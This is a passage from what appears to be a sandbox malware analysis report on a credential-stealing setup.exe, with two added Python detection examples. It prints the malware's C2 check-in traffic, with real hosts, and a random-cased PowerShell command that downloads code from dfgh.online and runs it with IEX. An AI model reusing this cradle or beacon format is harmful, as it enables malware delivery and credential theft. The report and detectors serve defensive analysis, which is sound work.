2025-01-07 14:26:25 UTC | 1110 | OUT | Data Raw: 2d 2d 4f 37 56 44 41 4c 56 46 32 4b 4c 30 41 35 30 4d 47 4c 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 44 32 37 37 46 46 36 41 43 46 39 30 37 35 43 44 39 39 35 38 39 43 45 38 41 45 36 36 35 44 35 0d 0a 2d 2d 4f 37 56 44 41 4c 56 46 32 4b 4c 30 41 35 30 4d 47 4c 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 37 56 44 41 4c 56 46 32 4b 4c 30 41 35 30 4d 47 4c 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c
Data Ascii (CRLF line breaks restored from the raw bytes; truncated as captured):
--O7VDALVF2KL0A50MGLZ
Content-Disposition: form-data; name="hwid"

DD277FF6ACF9075CD99589CE8AE665D5
--O7VDALVF2KL0A50MGLZ
Content-Disposition: form-data; name="pid"

1
--O7VDALVF2KL0A50MGLZ
Content-Disposition: form-data; name="lid"

hRjzG3--AL
2025-01-07 14:26:30 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Tue, 07 Jan 2025 14:26:30 GMT
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Set-Cookie: PHPSESSID=tmeikhdh9d2blqkkp7rr879m62; expires=Sat, 03 May 2025 08:13:04 GMT; Max-Age=9999999; path=/
                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            vary: accept-encoding
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=om0tYR1jYJnjfbEX35t5QdyolT0Wj7JiB0CeEY406lnxQWnQpGMMO3qE3Kl3yJ9G3WjQaCWeBTFijyz4d5S%2Fk5YTUgCdmBWTKwAlno4hHLE9PPR6%2F%2BvHQRxv1%2BDIpYlZlMU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8fe49f6daa418ce0-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1951&min_rtt=1950&rtt_var=735&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2027&delivery_rate=1486005&cwnd=211&unsent_bytes=0&cid=5836fbdc94bb3e61&ts=5005&x=0"
2025-01-07 14:26:30 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f (chunk size 0xf = 15 bytes) followed by ok 8.46.123.189
2025-01-07 14:26:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0 (terminating zero-length chunk)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49816 | 188.114.97.3 | 443 | 5916 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 14:26:30 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                            Content-Length: 113
                                                                                                                            Host: fairiespar.cyou
2025-01-07 14:26:30 UTC | 113 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 44 44 32 37 37 46 46 36 41 43 46 39 30 37 35 43 44 39 39 35 38 39 43 45 38 41 45 36 36 35 44 35
Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--ALFA&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=DD277FF6ACF9075CD99589CE8AE665D5
2025-01-07 14:26:31 UTC | 1130 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Tue, 07 Jan 2025 14:26:31 GMT
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Set-Cookie: PHPSESSID=gh1ckojk4em5nm2cmst4t0up6k; expires=Sat, 03 May 2025 08:13:10 GMT; Max-Age=9999999; path=/
                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            vary: accept-encoding
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q0p29IGaI4e8bUOhVSv2xlafLzn9tx5eFYnWnwiG2Zw3c9rZiLLqFilvpM%2B50e93E4qwrb%2Feq2I1jSgSNsTXD%2FOHhoeSo%2BD6duIN%2BJfVM8O9F6nJWwArYRmT4h3%2Fm0d0yyc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8fe49f901b0f4339-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1577&rtt_var=603&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1013&delivery_rate=1798029&cwnd=227&unsent_bytes=0&cid=aadd5787c241e423&ts=488&x=0"
2025-01-07 14:26:31 UTC | 218 | IN | Data Raw: 64 34 0d 0a 77 4a 36 6a 30 71 36 58 38 55 4b 6c 64 55 66 34 6f 39 31 75 47 43 49 44 5a 4a 62 75 41 55 4d 50 6b 78 4a 49 53 78 31 77 6d 31 43 62 35 59 47 6e 6a 4b 33 54 4b 74 45 42 4e 34 75 5a 67 55 46 45 44 57 41 42 38 5a 73 76 4d 47 66 38 59 68 52 6b 4a 55 57 73 5a 50 4b 6f 6b 65 61 61 6f 61 31 74 31 52 31 70 6a 4e 75 70 54 44 51 41 5a 52 43 30 31 44 4e 76 4c 66 59 77 63 6e 70 67 58 4f 42 79 74 62 79 5a 38 4d 62 6a 68 54 4c 57 54 78 76 58 2f 2f 49 46 64 45 74 7a 45 75 4f 44 61 44 42 36 2b 6a 77 37 49 33 49 41 78 33 2b 70 38 4e 65 4e 7a 66 75 42 48 64 59 64 4a 74 62 58 70 52 6f 36 44 69 45 43 34 73 77 37 63 79 4f 78 64 32 70 78 4c 51 33 47 0d 0a
Data Ascii: d4 (chunk size 0xd4 = 212 bytes) followed by a 212-character base64-alphabet payload, not decoded by the report: wJ6j0q6X8UKldUf4o91uGCIDZJbuAUMPkxJISx1wm1Cb5YGnjK3TKtEBN4uZgUFEDWAB8ZsvMGf8YhRkJUWsZPKokeaaoa1t1R1pjNupTDQAZRC01DNvLfYwcnpgXOBytbyZ8MbjhTLWTxvX//IFdEtzEuODaDB6+jw7I3IAx3+p8NeNzfuBHdYdJtbXpRo6DiEC4sw7cyOxd2pxLQ3G
2025-01-07 14:26:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0 (terminating zero-length chunk)
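The two POST /api requests in sessions 6 and 7 above are the LummaC check-in: a multipart body carrying hwid, pid and lid, answered with "ok <ip>", then a form-urlencoded act=get_message request answered with a base64-alphabet blob inside a chunked body. The Python below is an added example, not part of the Joe Sandbox report and not the malware's or the C2's code. It decodes the chunked replies, parses both request bodies and flags them on the field pattern. The sample bodies are transcribed from the capture and re-assembled into complete HTTP bodies (the report shows the first one truncated; the full lid value "hRjzG3--ALFA" from session 7 is assumed to be the one sent in session 6), and every function and variable name is this example's own.

```python
"""Parse and flag the two-stage LummaC check-in captured in sessions 6 and 7."""
from __future__ import annotations

import base64
import re
from urllib.parse import parse_qs

# Constructed sample: bytes transcribed from the capture above and re-assembled
# into complete HTTP bodies. The session-6 lid is assumed to equal session 7's.
STAGE1_CONTENT_TYPE = "multipart/form-data; boundary=O7VDALVF2KL0A50MGLZ"
STAGE1_BODY = (
    b"--O7VDALVF2KL0A50MGLZ\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"DD277FF6ACF9075CD99589CE8AE665D5\r\n"
    b"--O7VDALVF2KL0A50MGLZ\r\n"
    b'Content-Disposition: form-data; name="pid"\r\n\r\n'
    b"1\r\n"
    b"--O7VDALVF2KL0A50MGLZ\r\n"
    b'Content-Disposition: form-data; name="lid"\r\n\r\n'
    b"hRjzG3--ALFA\r\n"
    b"--O7VDALVF2KL0A50MGLZ--\r\n"
)
# Stage-1 reply exactly as captured: chunk "f" (15 bytes) then the zero chunk.
STAGE1_RESPONSE = bytes.fromhex("660d0a6f6b20382e34362e3132332e3138390d0a300d0a0d0a")

STAGE2_CONTENT_TYPE = "application/x-www-form-urlencoded"
STAGE2_BODY = (
    b"act=get_message&ver=4.0&lid=hRjzG3--ALFA"
    b"&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=DD277FF6ACF9075CD99589CE8AE665D5"
)
# Stage-2 reply as captured: chunk "d4" (212 bytes of base64) then the zero chunk.
STAGE2_RESPONSE = (
    b"d4\r\n"
    b"wJ6j0q6X8UKldUf4o91uGCIDZJbuAUMPkxJISx1wm1Cb5YGnjK3TKtEBN4uZgUFEDWAB8ZsvMGf8YhRk"
    b"JUWsZPKokeaaoa1t1R1pjNupTDQAZRC01DNvLfYwcnpgXOBytbyZ8MbjhTLWTxvX//IFdEtzEuODaDB6"
    b"+jw7I3IAx3+p8NeNzfuBHdYdJtbXpRo6DiEC4sw7cyOxd2pxLQ3G\r\n"
    b"0\r\n\r\n"
)


def decode_chunked(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body; stops at the zero-length chunk."""
    out, pos = bytearray(), 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";", 1)[0], 16)  # drop chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)
        out += body[pos:pos + size]
        pos += size + 2  # skip the CRLF that closes the chunk


def parse_multipart(body: bytes, content_type: str) -> dict[str, str]:
    """Extract name -> value for simple (no filename) multipart/form-data parts."""
    m = re.search(r"boundary=([^;\s]+)", content_type)
    if not m:
        return {}
    delim = b"--" + m.group(1).encode()
    fields: dict[str, str] = {}
    for part in body.split(delim):
        part = part.strip(b"\r\n")
        if not part or part == b"--":  # preamble or the closing "--"
            continue
        headers, _, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]+)"', headers)
        if name:
            fields[name.group(1).decode()] = value.decode(errors="replace")
    return fields


def classify_lumma_checkin(method: str, path: str, content_type: str, body: bytes) -> dict | None:
    """Return the beacon fields if the request matches the check-in seen above, else None."""
    if method != "POST" or path != "/api":
        return None
    if content_type.startswith("multipart/form-data"):
        f = parse_multipart(body, content_type)
        if {"hwid", "pid", "lid"}.issubset(f):
            return {"stage": "register", **f}
    elif content_type.startswith("application/x-www-form-urlencoded"):
        f = {k: v[0] for k, v in parse_qs(body.decode(errors="replace")).items()}
        if f.get("act") == "get_message" and {"hwid", "lid"}.issubset(f):
            return {"stage": "get_message", **f}
    return None


def parse_register_reply(raw: bytes) -> str | None:
    """Stage-1 reply is 'ok <ip>'; return the IP the server echoed, else None."""
    text = decode_chunked(raw).decode(errors="replace").strip()
    m = re.fullmatch(r"ok (\d{1,3}(?:\.\d{1,3}){3})", text)
    return m.group(1) if m else None


def parse_get_message_reply(raw: bytes) -> bytes:
    """Stage-2 reply is base64; return the decoded blob (still opaque to this example)."""
    return base64.b64decode(decode_chunked(raw), validate=True)


def summarize_capture() -> dict:
    """Run both stages over the constructed capture; this is what a detection would log."""
    return {
        "register": classify_lumma_checkin("POST", "/api", STAGE1_CONTENT_TYPE, STAGE1_BODY),
        "echoed_ip": parse_register_reply(STAGE1_RESPONSE),
        "get_message": classify_lumma_checkin("POST", "/api", STAGE2_CONTENT_TYPE, STAGE2_BODY),
        "blob_len": len(parse_get_message_reply(STAGE2_RESPONSE)),
    }


if __name__ == "__main__":
    print(summarize_capture())
```

The classifier keys on the field set rather than on the hostname, so it still fires when the C2 domain changes; the decoded stage-2 blob is left as bytes because the report does not show how it is encrypted.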


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49823 | 185.161.251.21 | 443 | 5916 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 14:26:32 UTC | 201 | OUT | GET /8574262446/ph.txt HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                            Host: cegu.shop
2025-01-07 14:26:32 UTC | 249 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.26.2
                                                                                                                            Date: Tue, 07 Jan 2025 14:26:32 GMT
                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                            Content-Length: 329
                                                                                                                            Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                            Connection: close
                                                                                                                            ETag: "676c9e2a-149"
                                                                                                                            Accept-Ranges: bytes
2025-01-07 14:26:32 UTC | 329 | IN | Data Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
Data Ascii (truncated in the report; the downloaded text is the PowerShell script that process 10 below executes): [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


Target ID: 0
Start time: 09:26:05
Start date: 07/01/2025
Path: C:\Users\user\Desktop\setup.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\setup.exe"
Imagebase: 0x400000
File size: 74'584'760 bytes
MD5 hash: 76F2E89ACE5C9B36679CE13B57C8B752
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1417442248.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1417555343.0000000000888000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 10
Start time: 09:26:32
Start date: 07/01/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -
Imagebase: 0xb30000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true
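The command line of process 10 is the script staged in ph.txt: it pins TLS 1.2, fetches https://dfgh.online/invoker.php with the machine name appended as a query parameter, and runs the response through IEX, with cmdlet and parameter names in random case to dodge naive string matching. The Python below is an added example, not part of the Joe Sandbox report or of any Sigma rule, showing how a detection engineer could match this download-and-execute cradle case-insensitively over process command lines. The captured command line is used verbatim; the other sample command lines are constructed for contrast, and the trait names and thresholds are this example's own.

```python
"""Flag PowerShell download-and-execute cradles in process command lines."""
from __future__ import annotations

import re

# Command line of process 10, transcribed verbatim from the report.
CAPTURED_CRADLE = (
    "powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = "
    "[Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='"
    "+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 "
    "(Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 "
    "Safari/57.36'; IEx $Ptsr.Content; -"
)

# Constructed command lines for contrast (not from the report).
SAMPLE_CMDLINES = [
    CAPTURED_CRADLE,
    "powershell.exe -NoProfile -Command Get-Service -Name wuauserv",
    "powershell -ep bypass Invoke-WebRequest -Uri https://example.invalid/tool.zip "
    "-OutFile C:\\Temp\\tool.zip",
    "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1",
]

# Each trait is matched on the lower-cased command line, so the random-case
# spelling in the sample (iWr, IEx, -uSebASIcpARsiNg) does not evade it.
# PowerShell accepts unambiguous parameter prefixes, hence -ep / -exec.
CRADLE_TRAITS = {
    "execution_policy_bypass": r"-(?:ep|exec|executionpolicy)\s+bypass\b",
    "web_download": r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|"
                    r"downloadstring|downloadfile|net\.webclient)\b",
    "invoke_expression": r"\biex\b|invoke-expression",
    "tls_override": r"servicepointmanager\]::securityprotocol",
    "hostname_exfil": r"\$env:computername",
}

URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
PS_IMAGE_RE = re.compile(r"(?:^|[\\/\s\"'])(?:powershell|pwsh)(?:\.exe)?\b")


def inspect_powershell_cmdline(cmdline: str) -> dict | None:
    """Return a verdict for a PowerShell command line, or None if it is not PowerShell."""
    lowered = cmdline.lower()
    if not PS_IMAGE_RE.search(lowered):
        return None
    hits = [trait for trait, pattern in CRADLE_TRAITS.items() if re.search(pattern, lowered)]
    urls = URL_RE.findall(cmdline)  # original case: URLs may be case-sensitive
    if "web_download" in hits and "invoke_expression" in hits:
        verdict = "download_and_execute_cradle"  # fetched content is run in-memory
    elif hits:
        verdict = "suspicious"  # e.g. download to disk, or bypass without a fetch
    else:
        verdict = "benign"
    return {"verdict": verdict, "hits": hits, "urls": urls}


def scan_cmdlines(cmdlines: list[str]) -> list[dict]:
    """Return the non-benign findings, with the offending command line abbreviated."""
    findings = []
    for cmdline in cmdlines:
        result = inspect_powershell_cmdline(cmdline)
        if result and result["verdict"] != "benign":
            findings.append({"cmdline": cmdline[:60], **result})
    return findings


if __name__ == "__main__":
    for finding in scan_cmdlines(SAMPLE_CMDLINES):
        print(finding)
```

Requiring both a fetch and an in-memory execution trait for the strongest verdict keeps legitimate "-ep bypass" admin scripts out of the top bucket, while the URL and $env:computername extraction gives the responder the staging host and the fact that the hostname was sent to it before the second stage ran.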

Target ID: 11
Start time: 09:26:32
Start date: 07/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.1517455602.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_7670000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 4'q$4'q$tPq$tPq$$q$$q$$q$Ql$Ql
                                                                                                                              • API String ID: 0-1080431814
                                                                                                                              • Opcode ID: 60f43620e5e631f3b9c9f88ff1a187580a4dc7ee849cbe58ca21324aa1e1727d
                                                                                                                              • Instruction ID: c00cf0ed7fd8cc2ee1d11b92fae5e224d696910f1b6252676b4a4630abc17463
                                                                                                                              • Opcode Fuzzy Hash: 60f43620e5e631f3b9c9f88ff1a187580a4dc7ee849cbe58ca21324aa1e1727d
                                                                                                                              • Instruction Fuzzy Hash: 86E129B1B043168FDB258B78981176ABBE2AF81694F14806BD507DF391DB32DD42CBB1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.1517455602.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_7670000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 4'q$4'q
                                                                                                                              • API String ID: 0-1467158625
                                                                                                                              • Opcode ID: 93f31163f3c6fe8e561d7eab18fdeae3a9192bd66464c230db88b4063dc1a737
                                                                                                                              • Instruction ID: 7b923d180d3b9b05baec3bba1927474f2f89ec0a60415aa5e53993e16130501d
                                                                                                                              • Opcode Fuzzy Hash: 93f31163f3c6fe8e561d7eab18fdeae3a9192bd66464c230db88b4063dc1a737
                                                                                                                              • Instruction Fuzzy Hash: FC7167B170430A9FDB384A79882177ABBE69FC3280F14806BD547DB391DB35C942CB61
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.1514794060.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_3070000_powershell.jbxd
                                                                                                                              Similarity